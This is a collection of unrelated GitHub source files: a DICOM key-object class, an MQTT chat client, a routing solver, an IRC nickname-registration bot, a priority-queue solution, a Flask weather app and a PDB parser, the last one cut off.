original_unit[0]:\n original_unit_translation=known_conversions_short[keys_short]\n \n if new_unit_translation is None: \n if len(new_unit) == 1 or len(new_unit) > 3:\n new_unit_translation=1.\n else:\n for keys_short in known_conversions_short:\n if keys_short == new_unit[0]:\n new_unit_translation=known_conversions_short[keys_short]\n \n if original_unit_translation is None: \n print('Unit translation cannot be done for the original unit. Returning 1.')\n if VERBOSE:\n if len(original_unit) > 3:\n print('Known conversion units are:')\n print(known_conversions_full)\n else:\n print('Known conversion units are:')\n print(known_conversions_short)\n original_unit_translation=1.\n \n if new_unit_translation is None:\n print('Unit translation cannot be done for the new unit. 
Returning 1.')\n if VERBOSE:\n if len(original_unit) > 3:\n print('Known conversion units are:')\n print(known_conversions_full)\n else:\n print('Known conversion units are:')\n print(known_conversions_short)\n new_unit_translation=1.\n \n return original_unit_translation/new_unit_translation\n \n \n \n \n \n\n#import matplotlib.pyplot as plt\n\n#plt.clf()\n#ydata, xdata = np.meshgrid(np.arange(10),np.arange(20))\n#xdata = xdata.astype(float)\n#ydata = ydata.astype(float)\n#xdata += ydata*0.1\n#ydata += xdata*0.2\n#xbox, ybox = grid_to_box(xdata,ydata)\n#data = (xdata + ydata)\n#plt.pcolormesh(xbox,ybox,np.transpose(data),cmap='Greys')\n#plt.scatter(xdata.flatten(), ydata.flatten())\n\n","repo_name":"fusion-flap/flap","sub_path":"flap/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":22652,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"72596574482","text":"\"\"\"Content that is specific to Key Object Selection IODs.\"\"\"\nfrom typing import cast, List, Optional, Sequence, Union\n\nfrom pydicom.dataset import Dataset\nfrom pydicom.sr.coding import Code\nfrom pydicom.sr.codedict import codes\n\nfrom highdicom.sr.coding import CodedConcept\nfrom highdicom.sr.enum import RelationshipTypeValues, ValueTypeValues\nfrom highdicom.sr.value_types import (\n ContainerContentItem,\n ContentSequence,\n TextContentItem,\n ImageContentItem,\n CompositeContentItem,\n WaveformContentItem,\n)\nfrom highdicom.sr.templates import (\n DeviceObserverIdentifyingAttributes,\n ObserverContext,\n PersonObserverIdentifyingAttributes,\n)\n\n\nclass KeyObjectSelection(ContentSequence):\n\n \"\"\"Sequence of structured reporting content item describing a selection\n of DICOM objects according to structured reporting template\n :dcm:`TID 2010 Key Object Selection <part16/chapter_A.html#sect_TID_2010>`.\n \"\"\"\n\n def __init__(\n self,\n document_title: Union[Code, CodedConcept],\n referenced_objects: Sequence[Dataset],\n observer_person_context: Optional[ObserverContext] = None,\n observer_device_context: Optional[ObserverContext] = None,\n description: Optional[str] = None\n ):\n \"\"\"\n Parameters\n ----------\n document_title: Union[pydicom.sr.coding.Code, highdicom.srCodedConcept]\n Coded title of the document\n (see :dcm:`CID 7010 <part16/sect_CID_7010.html>`)\n referenced_objects: Sequence[pydicom.dataset.Dataset]\n Metadata of selected objects that should be referenced\n observer_person_context: Union[highdicom.sr.ObserverContext, None], optional\n Observer context describing the person that selected the objects\n observer_device_context: Union[highdicom.sr.ObserverContext, None], optional\n Observer context describing the device that selected the objects\n description: Union[str, None], optional\n Description of the selected objects\n\n \"\"\" # noqa: E501\n super().__init__(is_root=True)\n item = ContainerContentItem(\n name=document_title, # CID 7010\n template_id='2010'\n )\n item.ContentSequence = ContentSequence()\n\n if observer_person_context is not None:\n if not isinstance(observer_person_context, ObserverContext):\n raise TypeError(\n 'Argument \"observer_person_context\" must have type '\n 'ObserverContext.'\n )\n if observer_person_context.observer_type != codes.DCM.Person:\n raise ValueError(\n 'Argument \"observer_person_context\" must have Observer '\n 'Type \"Person\".'\n )\n item.ContentSequence.extend(observer_person_context)\n if observer_device_context is not None:\n if not 
isinstance(observer_device_context, ObserverContext):\n raise TypeError(\n 'Argument \"observer_device_context\" must have type '\n 'ObserverContext.'\n )\n if observer_device_context.observer_type != codes.DCM.Device:\n raise ValueError(\n 'Argument \"observer_device_context\" must have Observer '\n 'Type \"Device\".'\n )\n item.ContentSequence.extend(observer_device_context)\n\n if description is not None:\n description_item = TextContentItem(\n name=CodedConcept(\n value='113012',\n scheme_designator='DCM',\n meaning='Key Object Description'\n ),\n value=description,\n relationship_type=RelationshipTypeValues.CONTAINS\n )\n item.ContentSequence.append(description_item)\n\n if len(referenced_objects) == 0:\n raise ValueError('At least one object must be referenced.')\n\n # PS3.3 C.17.3 SR Document Content Module\n # Though many Templates in PS3.16 do not require that the Purpose of\n # Reference be conveyed in the Concept Name, a generic Concept Name,\n # such as (260753009, SCT, \"Source\"), may be used, since anonymous\n # (unnamed) Content Items may be undesirable for some implementations\n # (e.g., for which the name of a name-value pair is required).\n name = CodedConcept(\n value='260753009',\n scheme_designator='SCT',\n meaning='Source',\n )\n for ds in referenced_objects:\n reference_item: Union[ImageContentItem, CompositeContentItem]\n if 'Rows' in ds and 'Columns' in ds:\n reference_item = ImageContentItem(\n name=name,\n referenced_sop_class_uid=ds.SOPClassUID,\n referenced_sop_instance_uid=ds.SOPInstanceUID,\n relationship_type=RelationshipTypeValues.CONTAINS\n )\n item.ContentSequence.append(reference_item)\n else:\n reference_item = CompositeContentItem(\n name=name,\n referenced_sop_class_uid=ds.SOPClassUID,\n referenced_sop_instance_uid=ds.SOPInstanceUID,\n relationship_type=RelationshipTypeValues.CONTAINS\n )\n item.ContentSequence.append(reference_item)\n\n self.append(item)\n\n @classmethod\n def from_sequence(\n cls,\n sequence: Sequence[Dataset],\n is_root: bool = True\n ) -> 'KeyObjectSelection':\n \"\"\"Construct object from a sequence of datasets.\n\n Parameters\n ----------\n sequence: Sequence[pydicom.dataset.Dataset]\n Datasets representing \"Key Object Selection\" SR Content Items\n of Value Type CONTAINER (sequence shall only contain a single item)\n is_root: bool, optional\n Whether the sequence is used to contain SR Content Items that are\n intended to be added to an SR document at the root of the document\n content tree\n\n Returns\n -------\n highdicom.ko.KeyObjectSelection\n Content Sequence containing root CONTAINER SR Content Item\n\n \"\"\"\n if len(sequence) == 0:\n raise ValueError('Sequence contains no SR Content Items.')\n if len(sequence) > 1:\n raise ValueError(\n 'Sequence contains more than one SR Content Item.'\n )\n dataset = sequence[0]\n if dataset.ValueType != ValueTypeValues.CONTAINER.value:\n raise ValueError(\n 'Item #1 of sequence is not an appropriate SR Content Item '\n 'because it does not have Value Type CONTAINER.'\n )\n if dataset.ContentTemplateSequence[0].TemplateIdentifier != '2010':\n raise ValueError(\n 'Item #1 of sequence is not an appropriate SR Content Item '\n 'because it does not have Template Identifier \"2010\".'\n )\n instance = ContentSequence.from_sequence(sequence, is_root=True)\n instance.__class__ = KeyObjectSelection\n return cast(KeyObjectSelection, instance)\n\n def get_observer_contexts(\n self,\n observer_type: Optional[Union[CodedConcept, Code]] = None\n ) -> List[ObserverContext]:\n \"\"\"Get observer 
contexts.\n\n Parameters\n ----------\n observer_type: Union[highdicom.sr.CodedConcept, pydicom.sr.coding.Code, None], optional\n Type of observer (\"Device\" or \"Person\") for which the results should be filtered\n\n Returns\n -------\n List[highdicom.sr.ObserverContext]\n Observer contexts\n\n \"\"\" # noqa: E501\n root_item = self[0]\n matches = [\n (i, item) for i, item in enumerate(root_item.ContentSequence, 1)\n if item.name == codes.DCM.ObserverType\n ]\n observer_contexts = []\n attributes: Union[\n DeviceObserverIdentifyingAttributes,\n PersonObserverIdentifyingAttributes,\n ]\n for i, (index, item) in enumerate(matches):\n if observer_type is not None:\n if item.value != observer_type:\n continue\n try:\n next_index = matches[i + 1][0]\n except IndexError:\n next_index = -1\n if item.value == codes.DCM.Device:\n attributes = DeviceObserverIdentifyingAttributes.from_sequence(\n sequence=root_item.ContentSequence[index:next_index]\n )\n elif item.value == codes.DCM.Person:\n attributes = PersonObserverIdentifyingAttributes.from_sequence(\n sequence=root_item.ContentSequence[index:next_index]\n )\n else:\n raise ValueError(f'Unexpected observer type \"{item.meaning}\".')\n context = ObserverContext(\n observer_type=item.value,\n observer_identifying_attributes=attributes\n )\n observer_contexts.append(context)\n return observer_contexts\n\n def get_references(\n self,\n value_type: Optional[ValueTypeValues] = None,\n sop_class_uid: Optional[str] = None\n ) -> List[\n Union[ImageContentItem, CompositeContentItem, WaveformContentItem]\n ]:\n \"\"\"Get referenced objects.\n\n Parameters\n ----------\n value_type: Union[highdicom.sr.ValueTypeValues, None], optional\n Value type of content items that reference objects\n sop_class_uid: Union[str, None], optional\n SOP Class UID of referenced object\n\n Returns\n -------\n List[Union[highdicom.sr.ImageContentItem, highdicom.sr.CompositeContentItem, highdicom.sr.WaveformContentItem]]\n Content items that reference objects\n\n \"\"\" # noqa: E501\n supported_value_types = {\n ValueTypeValues.IMAGE,\n ValueTypeValues.COMPOSITE,\n ValueTypeValues.WAVEFORM,\n }\n if value_type is not None:\n value_type = ValueTypeValues(value_type)\n if value_type not in supported_value_types:\n raise ValueError(\n f'Value type \"{value_type.value}\" is not supported for '\n 'referencing selected objects.'\n )\n expected_value_types = {value_type}\n else:\n expected_value_types = supported_value_types\n return [\n item for item in self[0].ContentSequence\n if (item.value_type in expected_value_types) and (\n sop_class_uid is None or (\n item.referenced_sop_class_uid == sop_class_uid\n )\n )\n ]\n","repo_name":"ImagingDataCommons/highdicom","sub_path":"src/highdicom/ko/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":10892,"program_lang":"python","lang":"en","doc_type":"code","stars":142,"dataset":"github-code","pt":"3"} +{"seq_id":"30363066379","text":"# Subscriber-side test\nimport json\nimport sys\nimport os\nimport paho.mqtt.client as mqtt\nimport time\n\n\ndef on_connect(client,userdata,flags,rc):\n print(\"Connected successfully\")\n\n client.subscribe(\"test\")\n\n\ndef on_message(client,userdata,msg):\n payload = json.loads(msg.payload.decode())\n print(payload.get(\"user\") + \":\" + payload.get(\"say\"))\n\n\nif __name__ == '__main__':\n TASK_TOPIC = 'test'\n client_id = time.strftime('%Y%m%d%H%M%S', time.localtime(time.time()))\n\n client = mqtt.Client(client_id, transport='tcp')\n client.connect(\"127.0.0.1\", 1883)\n user = input(\"Enter your name: \")\n 
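# store the entered name as userdata on the client and register the MQTT callbacks\n 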
client.user_data_set(user)\n client.on_connect = on_connect\n client.on_message = on_message\n\n client.loop_start()\n\n while True:\n str = input()\n if str:\n client.publish(\"test\",json.dumps({\"user\":user,\"say\":str}))","repo_name":"040ling/al_api","sub_path":"sub.py","file_name":"sub.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8377626283","text":"from __future__ import print_function\nfrom ortools.constraint_solver import routing_enums_pb2\nfrom ortools.constraint_solver import pywrapcp\n\nclass Tsp:\n\n def create_data_model(self, bins_to_collect, num_vehicles):\n \"\"\"Stores the data for the problem.\"\"\"\n data = {}\n data['distance_matrix'] = []\n for i in range(len(bins_to_collect)):\n distances_from_i = []\n for j in range(len(bins_to_collect)):\n manhattan_distance = abs(bins_to_collect[i][0]-bins_to_collect[j][0])+abs(bins_to_collect[i][1]-bins_to_collect[j][1])\n distances_from_i.append(manhattan_distance)\n data['distance_matrix'].append(distances_from_i)\n data['num_vehicles'] = num_vehicles\n data['depot'] = 0\n return data\n\n\n def print_solution(self, data, manager, routing, solution):\n \"\"\"Prints solution on console.\"\"\"\n max_route_distance = 0\n solution_matrix = []\n for vehicle_id in range(data['num_vehicles']):\n index = routing.Start(vehicle_id)\n # distance, route\n solution_matrix.append([0, []])\n plan_output = 'Route for vehicle {}:\\n'.format(vehicle_id)\n route_distance = 0\n while not routing.IsEnd(index):\n plan_output += ' {} -> '.format(manager.IndexToNode(index))\n solution_matrix[vehicle_id][1].append(manager.IndexToNode(index))\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(\n previous_index, index, vehicle_id)\n plan_output += '{}\\n'.format(manager.IndexToNode(index))\n plan_output += 'Distance of the route: {}m\\n'.format(route_distance)\n #print(plan_output)\n max_route_distance = max(route_distance, max_route_distance)\n solution_matrix[vehicle_id][0] = route_distance\n #print('Maximum of the route distances: {}m'.format(max_route_distance))\n print(solution_matrix)\n return solution_matrix\n\n def __init__(self, bins_to_collect, num_vehicles):\n \"\"\"Entry point of the program.\"\"\"\n # Instantiate the data problem.\n data = self.create_data_model(bins_to_collect, num_vehicles)\n\n # Create the routing index manager.\n manager = pywrapcp.RoutingIndexManager(len(data['distance_matrix']),\n data['num_vehicles'], data['depot'])\n\n # Create Routing Model.\n routing = pywrapcp.RoutingModel(manager)\n\n\n def distance_callback(from_index, to_index):\n \"\"\"Returns the distance between the two nodes.\"\"\"\n # Convert from routing variable Index to distance matrix NodeIndex.\n from_node = manager.IndexToNode(from_index)\n to_node = manager.IndexToNode(to_index)\n return data['distance_matrix'][from_node][to_node]\n\n transit_callback_index = routing.RegisterTransitCallback(distance_callback)\n\n # Define cost of each arc.\n routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)\n\n # Add Distance constraint.\n dimension_name = 'Distance'\n routing.AddDimension(\n transit_callback_index,\n 0, # no slack\n 3000, # vehicle maximum travel distance\n True, # start cumul to zero\n dimension_name)\n distance_dimension = routing.GetDimensionOrDie(dimension_name)\n distance_dimension.SetGlobalSpanCostCoefficient(100)\n\n\n # Setting first solution 
heuristic.\n search_parameters = pywrapcp.DefaultRoutingSearchParameters()\n search_parameters.first_solution_strategy = (\n routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)\n\n # Solve the problem.\n solution = routing.SolveWithParameters(search_parameters)\n\n # Print solution on console.\n if solution:\n self.routes = self.print_solution(data, manager, routing, solution)\n","repo_name":"julesdruguet/garbage-collect-optimization","sub_path":"tsp.py","file_name":"tsp.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"28056385915","text":"#!/usr/bin/env python\n\nimport socket\nimport optparse\nimport ssl\nimport time\nimport random\nimport string\nimport sys\nimport thread\nfrom pymailinator.wrapper import Inbox\n\n\n\nclass ircbot(object):\n\n\tdef __init__(self, server, port, nick, pword, ssl, apikey):\n\n\t\tself.server = server\n\t\tself.port = port\n\t\tself.nick = nick\n\t\tself.pword = pword\n\t\tself.code = None\n\t\tself.ssl = ssl\n\t\tself.apikey = None\n\t\tself.email = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))\n\t\tself.email = self.email + \"@reconmail.com\"\n\n\n\t\tself.status = {\n\t\t\t\"data\": None,\n\t\t\t\"registered\": False,\n\t\t\t\"connected\": False,\n\t\t\t\"verified\": False,\n\t\t\t\"codegot\": False\n\n\t\t}\n\tdef get_sender(msg):\n\t\tresult = \"\"\n\t\tfor char in msg:\n\t\t\tif char == \"!\":\n\t\t\t\tbreak\n\t\t\tif char != \":\":\n\t\t\t\tresult += char\n\t\treturn result\n\n\tdef get_message(self, msg):\n\t\tresult = \"\"\n\t\ti = 3\n\t\tlength = len(msg)\n\t\twhile i < length:\n\t\t\tresult += msg[i] + \" \"\n\t\t\ti += 1\n\t\tresult = result.lstrip(':')\n\t\treturn result\n\n\tdef connect(self):\n\t\ttry:\n\t\t\tprint(\"[+] Connecting to \" + self.server + \":\" + str(self.port) + \"...\")\n\t\t\tself.irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\t\tself.irc.connect((self.server, self.port))\n\t\t\tif self.ssl == True:\n\t\t\t\tself.irc = ssl.wrap_socket(self.irc)\n\n\t\t\tself.irc.send(bytes(\"USER \" + self.nick +\" \"+ self.nick +\" \"+ self.nick + \" :Reggie!\\r\\n\", \"UTF-8\"))\n\n\t\t\tnickchange = self.changenick()\n\n\t\t\twhile nickchange == 0:\n\t\t\t\tprint(\"[-] Nickname Taken: \" + self.nick)\n\t\t\t\tself.nick = input(\"Enter a new nickname (!quit to quit) > \")\n\t\t\t\tnickchange = self.changenick()\n\n\t\t\tprint(\"[+] Nick successfully changed to: \" + self.nick)\n\n\t\t\tself.irc.send(bytes(\"PRIVMSG nickserv :INOOPE\\r\\n\", \"UTF-8\"))\n\t\t\tprint(\"[+] Connected to \" + self.server + \":\" + str(self.port))\n\t\t\tself.status[\"connected\"] = True\n\n\t\texcept Exception as e:\n\t\t\tprint(\"[-] Error connecting to server: \" + str(e))\n\n\tdef getcode(self):\n\t\ttry:\n\t\t\tinbox = Inbox(self.apikey)\n\t\t\tinbox.get(self.mailname)\n\t\t\tmail = inbox.messages[-1]\n\t\t\tmail.get_message()\n\t\t\ttext = mail.body.split(\" \" + self.nick + \" \")\n\t\t\tcode = text[1].split()[0]\n\n\t\t\tself.code = code\n\t\texcept Exception as e:\n\t\t\tprint(\"[-] Error Obtaining Verification Code: \" + str(e))\n\n\tdef changenick(self):\n\t\tprint(\"[+] Attempting to change nick...\")\n\t\tself.irc.send(bytes(\"NICK \" + self.nick + \"\\r\\n\", \"UTF-8\"))\n\n\t\tstart = time.clock()\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tircmsg = self.recv()\n\t\t\t\tif ircmsg.find(\"PING :\") != -1:\n\t\t\t\t\tself.pong(ircmsg)\n\t\t\t\telif ircmsg.find(\"Please choose a different\") != 
-1:\n\t\t\t\t\treturn 0\n\t\t\t\telif time.clock() - start > 20:\n\t\t\t\t\treturn 1\n\t\t\texcept Exception as e:\n\t\t\t\tprint(\"[-] Error changing nick: \" + str(e))\n\n\tdef pong(self, msg):\n\t\ttry:\n\t\t\tprint(\"[+] Sending PONG\")\n\t\t\tself.irc.send((\"PONG \" + msg.split()[1] + \"\\r\\n\").encode())\n\t\t\tprint(\"[+] PONG \" + msg.split()[1])\n\t\texcept Exception as e:\n\t\t\tprint(\"[-] Error during PONG: \" + str(e))\n\n\tdef recv(self):\n\t\tself.status[\"data\"] = (self.irc.recv(1024)).decode(\"UTF-8\")\n\t\ttemp = str.split(self.status[\"data\"], \"\\n\")\n\t\tself.status[\"data\"] = temp.pop()\n\n\n\t\treturn ' '.join(temp)\n\n\tdef register(self):\n\t\ttry:\n\n\t\t\tprint(\"[+] Sending Registration\")\n\t\t\tprint(\"[+] Nick: \" + self.nick)\n\t\t\tprint(\"[+] Password: \" + self.pword)\n\t\t\tself.irc.send(bytes(\"PRIVMSG nickserv: register \" + self.pword + self.email + \"\\r\\n\", \"UTF-8\"))\n\t\t\tstart = time.clock()\n\t\t\twhile True:\n\t\t\t\tircmsg = self.recv()\n\t\t\t\tif ircmsg.find(\"PING :\") != -1:\n\t\t\t\t\tself.pong(ircmsg)\n\t\t\t\telif ircmsg.find(\"is now registered to \" + self.email) != -1:\n\t\t\t\t\treturn 1\n\t\t\t\telif ircmsg.find( self.nick + \" registered\") != -1:\n\t\t\t\t\treturn 1\n\t\t\t\telif ircmsg.find(\"GROUP\") != -1:\n\t\t\t\t\treturn -1\n\n\t\t\t\telif time.clock() - start > 60:\n\t\t\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\tprint(\"[-] Error Sending Registration: \" + str(e))\n\t\t\texit(-1)\n\n\tdef verify(self):\n\t\ttry:\n\t\t\tself.irc.send(bytes(\"PRIVMSG nickserv: verify register \" + self.nick + self.code, \"UTF-8\"))\n\t\t\tprint(\"[+] Attempting Verification\")\n\t\t\tprint(\"[+] Nick: \" + self.nick)\n\t\t\tprint(\"[+] Code: \" + self.code)\n\n\t\t\tstart = time.clock()\n\t\t\twhile True:\n\t\t\t\tircmsg = self.recv()\n\t\t\t\tif ircmsg.find(\"PING :\") != -1:\n\t\t\t\t\tself.pong(ircmsg)\n\t\t\t\telif ircmsg.find(\"has now been verified.\") != -1:\n\t\t\t\t\treturn 1\n\t\t\t\telif time.clock() - start > 20:\n\t\t\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\tprint(\"[-] Error Sending Verification: \" + str(e))\n\t\t\texit(-1)\n\nif __name__ == '__main__':\n\tparser = optparse.OptionParser()\n\tparser.add_option(\"-s\", \"--server\", help=\"Server to register your nick.\", dest=\"server\", action=\"store\")\n\tparser.add_option(\"-p\", \"--port\", help=\"Port on the server to connect through (usually 6667 or 6697 for SSL).\", dest=\"port\", action=\"store\", type=\"int\")\n\tparser.add_option(\"-n\", \"--nick\", help=\"The nickname to register.\", dest=\"nick\", action=\"store\")\n\tparser.add_option(\"-w\", \"--password\", help=\"Password with which to register the nickname.\", dest=\"pword\", action=\"store\")\n\t#parser.add_option(\"-e\", \"--email\", help=\"Email to send verification code.\", dest=\"email\")\n\tparser.add_option(\"-e\", \"--secure\", help=\"Set if server uses SSL encryption.\", dest=\"ssl\", default=False, action=\"store_true\")\n\tparser.add_option(\"-k\", \"--key\", help=\"Your mailinator API key.\", dest=\"key\", action=\"store\")\n\n\t(opts, args) = parser.parse_args()\n\n\tif opts.server is None:\n\t print(\"Please specify a server.\\n\")\n\t parser.print_help()\n\t exit(-1)\n\telif opts.nick is None:\n\t print(\"Please specify a nickname.\\n\")\n\t parser.print_help()\n\t exit(-1)\n\telif opts.pword is None:\n\t print(\"Please specify a password.\\n\")\n\t parser.print_help()\n\t exit(-1)\n\telif opts.key is None:\n\t print(\"Please specify a Mailinator API key.\\n\")\n\t 
parser.print_help()\n\t exit(-1)\n\n\tif opts.port is None:\n\t\tif opts.ssl == True:\n\t\t\topts.port = 6697\n\t\telse:\n\t\t\topts.port = 6667\n\t \n\t\tprint(\"No port specified. Defaulting to %d \\n\" % opts.port)\n\n\n\n\n\tregbot = ircbot(opts.server, opts.port, opts.nick, opts.pword, opts.ssl, opts.key)\n\n\tregbot.connect()\n\n\tif regbot.status[\"connected\"] != False:\n\n\t\t\n\t\tprint(\"Waiting to be able to register... (This should take about 2 minutes)\")\n\t\t\n\t\tstart_time = time.clock()\n\n\t\twhile True:\n\n\t\t\ttry:\n\t\t\t\tircmsg = regbot.recv().split()\n\t\t\t\tfor line in ircmsg:\n\t\t\t\t\tline = str.rstrip(line)\n\t\t\t\t\tline = str.split(line)\n\n\t\t\t\t\tif line[0] == \"PING\":\n\t\t\t\t\t\tprint(\"[+] PING Received\")\n\t\t\t\t\t\tregbot.pong(' '.join(ircmsg))\n\t\t\t\t\tif line[1] == \"PRIVMSG\":\n\t\t\t\t\t\tsender = get_sender(line[0])\n\t\t\t\t\t\tmessage = get_message(line)\n\t\t\t\t\t\tprint(sender + \": \" + message)\n\n\t\t\t\tif (regbot.status[\"registered\"] == False) and (time.clock() - start_time > 35):\n\t\t\t\t\tprint(\"[+] Starting Registration Process: \" + str(time.clock()- start_time))\n\t\t\t\t\tregistration = regbot.register()\n\t\t\t\t\tif registration == 1:\n\t\t\t\t\t\tprint(\"[+] Registration Successful\")\n\t\t\t\t\t\tregbot.status[\"registered\"] = True\n\t\t\t\t\telif registration == 0:\n\t\t\t\t\t\tprint(\"[-] Registration Request Timed Out\")\n\t\t\t\t\t\texit(-1)\n\t\t\t\t\telif registration == -1:\n\t\t\t\t\t\tprint(\"[-] Disconnect for a few minutes and try again.\")\n\t\t\t\t\t\texit(-1)\n\t\t\t\telif (regbot.status[\"codegot\"] == False) and (regbot.status[\"registered\"] == True):\n\t\t\t\t\tregbot.getcode()\n\t\t\t\t\tprint(\"[+] Code Received: \" + regbot.code)\n\t\t\t\t\tregbot.status[\"codegot\"] = True\n\t\t\t\telif (regbot.status[\"verified\"] == False) and (regbot.code != None):\n\t\t\t\t\tverification = regbot.verify()\n\t\t\t\t\tif verification == 1:\n\t\t\t\t\t\tprint(\"[+] Verification Successful\")\n\t\t\t\t\t\tregbot.status[\"verified\"] = True\n\t\t\t\t\telif verification == 0:\n\t\t\t\t\t\tprint(\"[-] Verification Request Timed Out\")\n\t\t\t\t\t\tprint(\"[!] 
If Verification Code is not Blank, Try Verifying Manually\")\n\t\t\t\t\t\texit(0)\n\n\n\t\t\t\t\n\n\t\t\texcept Exception as e:\n\t\t\t\tprint(\"[-] Error while looping: \" + str(e))\n\n","repo_name":"fancyscript/reggie","sub_path":"reggie.py","file_name":"reggie.py","file_ext":"py","file_size_in_byte":7666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14439409633","text":"#!/usr/bin/python3\n\ninf = open('priority-queue.in', 'r')\nouf = open('priority-queue.out', 'w')\n\nH = [None]\n\npos = {}\n\ndef swap(a, b):\n H[a], H[b] = H[b], H[a]\n pos[H[a][1]] = a\n pos[H[b][1]] = b\n\ndef sift_up(v):\n while (v != 1):\n if (H[v // 2] > H[v]):\n break\n else:\n swap(v // 2, v)\n v = v // 2\n\ndef add(elem, prior):\n pos[elem] = len(H)\n H.append((prior, elem))\n sift_up(len(H) - 1)\n\ndef sift_down(v):\n while (2 * v < len(H)):\n ind = 2 * v\n if 2 * v + 1 < len(H) and H[2 * v + 1] > H[2 * v]:\n ind = 2 * v + 1\n if (H[ind] < H[v]):\n break\n swap(v, ind)\n v = ind\n\ndef extract_min():\n assert len(H) > 1\n swap(1, len(H) - 1)\n del pos[H[-1][1]]\n ret = H.pop()\n sift_down(1)\n return ret[1], ret[0]\n\nfor command in inf.readlines():\n command = command.strip().split()\n if (command[0] == 'ADD'):\n add(command[1], int(command[2]))\n elif (command[0] == 'POP'):\n print(*extract_min(), file=ouf)\n else:\n H[pos[command[1]]] = (int(command[2]), command[1])\n sift_up(pos[command[1]])\n sift_down(pos[command[1]])\n","repo_name":"parallel-p/please","sub_path":"problems_on_please/CpyAug2012/contests/day09/priority-queue/solutions/solution_ma.py","file_name":"solution_ma.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"6402130628","text":"from app import app\nfrom flask import render_template, redirect, request\nimport requests\nfrom datetime import date, datetime\n\napi_key = \"\"\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/result', methods=['POST', 'GET'])\ndef result():\n zip_code = request.form['zipcode']\n \n # current weather\n data = get_weather_data(zip_code, api_key)\n temp = \"{0:.2f}\".format(data[\"main\"][\"temp\"])\n feels_like = \"{0:.2f}\".format(data[\"main\"][\"feels_like\"])\n weather = data[\"weather\"][0][\"main\"]\n location = data[\"name\"]\n\n lat = data[\"coord\"][\"lat\"]\n lon = data[\"coord\"][\"lon\"]\n\n # hourly\n data2 = get_weather_data2(lat, lon, api_key)\n h_temp = []\n for x in range(len(data2[\"hourly\"])):\n temperature = \"{0:.2f}\".format(data2[\"hourly\"][x][\"temp\"])\n h_temp.append(temperature)\n\n h_feels_like = []\n for x in range(len(data2[\"hourly\"])):\n feels = \"{0:.2f}\".format(data2[\"hourly\"][x][\"feels_like\"])\n h_feels_like.append(feels)\n\n h_weather = []\n for x in range(len(data2[\"hourly\"])):\n weath = data2[\"hourly\"][x][\"weather\"][0][\"main\"]\n h_weather.append(weath)\n\n hourly = [] \n for x in range(len(data2[\"hourly\"])):\n dt = int(data2[\"hourly\"][x][\"dt\"])\n dt = datetime.utcfromtimestamp(dt).strftime('%H:%M')\n hourly.append(dt)\n\n # daily\n d_temp = []\n for x in range(len(data2[\"daily\"])):\n temperature = data2[\"daily\"][x][\"temp\"][\"day\"]\n d_temp.append(temperature)\n\n d_feels_like_day = []\n for x in range(len(data2[\"daily\"])):\n feels = data2[\"daily\"][x][\"feels_like\"][\"day\"]\n d_feels_like_day.append(feels)\n\n d_feels_like_night = []\n for x in range(len(data2[\"daily\"])):\n feels = 
data2[\"daily\"][x][\"feels_like\"][\"night\"]\n d_feels_like_night.append(feels)\n\n d_weather = []\n for x in range(len(data2[\"daily\"])):\n weath = data2[\"daily\"][x][\"weather\"][0][\"main\"]\n d_weather.append(weath)\n\n day = []\n for x in range(len(data2[\"daily\"])):\n dt = int(data2[\"daily\"][x][\"dt\"])\n dt = datetime.utcfromtimestamp(dt).strftime('%A')\n day.append(dt)\n\n return render_template('result.html', \n location=location, temp=temp,\n feels_like=feels_like, weather=weather,\n h_temp=h_temp, h_feels_like=h_feels_like,\n h_weather=h_weather, hourly=hourly,\n d_temp=d_temp, d_feels_like_day=d_feels_like_day,\n d_weather=d_weather, d_feels_like_night=d_feels_like_night,\n day=day)\n\n\ndef get_weather_data(zip_code, api_key):\n api_url = \"http://api.openweathermap.org/\" \\\n \"data/2.5/weather?zip={}&units=metric&appid={}\".format(zip_code, api_key)\n r = requests.get(api_url)\n return r.json()\n\ndef get_weather_data2(lat, lon, api_key):\n api_url = \"https://api.openweathermap.org/\" \\\n \"data/2.5/onecall?lat={}&lon={}&units=metric&appid={}\".format(lat,lon, api_key)\n r = requests.get(api_url)\n return r.json()\n","repo_name":"okGus/Weather-Dashboard","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41381091020","text":"# import pypdb\n# info = pypdb.get_info('NAG')\n# import pandas as pd\nimport numpy as np\n\nimport re\natoms = []\nbonds = []\nwith open(\"pdb_files/5b27.pdb\",\"r\") as file:\n for line in file.readlines():\n if line[:4] == \"ATOM\":\n # lines.append(line)\n # coords = \"[\"+\",\".join(re.sub(r' +',\",\",line).split(\",\")[6:9])+\"]\"\n # atoms.append(coords)\n atoms.append(line)\n elif line[:6] == \"CONECT\":\n bonds.append(line)\n\n\nimport pandas as pd\nlen(atoms)\natoms[:10]\nimport sys\nif sys.version_info[0] < 3:\n from StringIO import StringIO\nelse:\n from io import StringIO\n\nfake_file = StringIO(\"\".join(atoms))\npd.read_csv(fake_file, delim_whitespace=True, header=None)\nfake_file2 = StringIO(\"A 0 0 0 0 0\\n\"+\"\".join(bonds))\nd = pd.read_csv(fake_file2, delim_whitespace=True, header=None, dtype={0:str, 1:pd.Int64Dtype(), 2:pd.Int64Dtype(), 3:pd.Int64Dtype(), 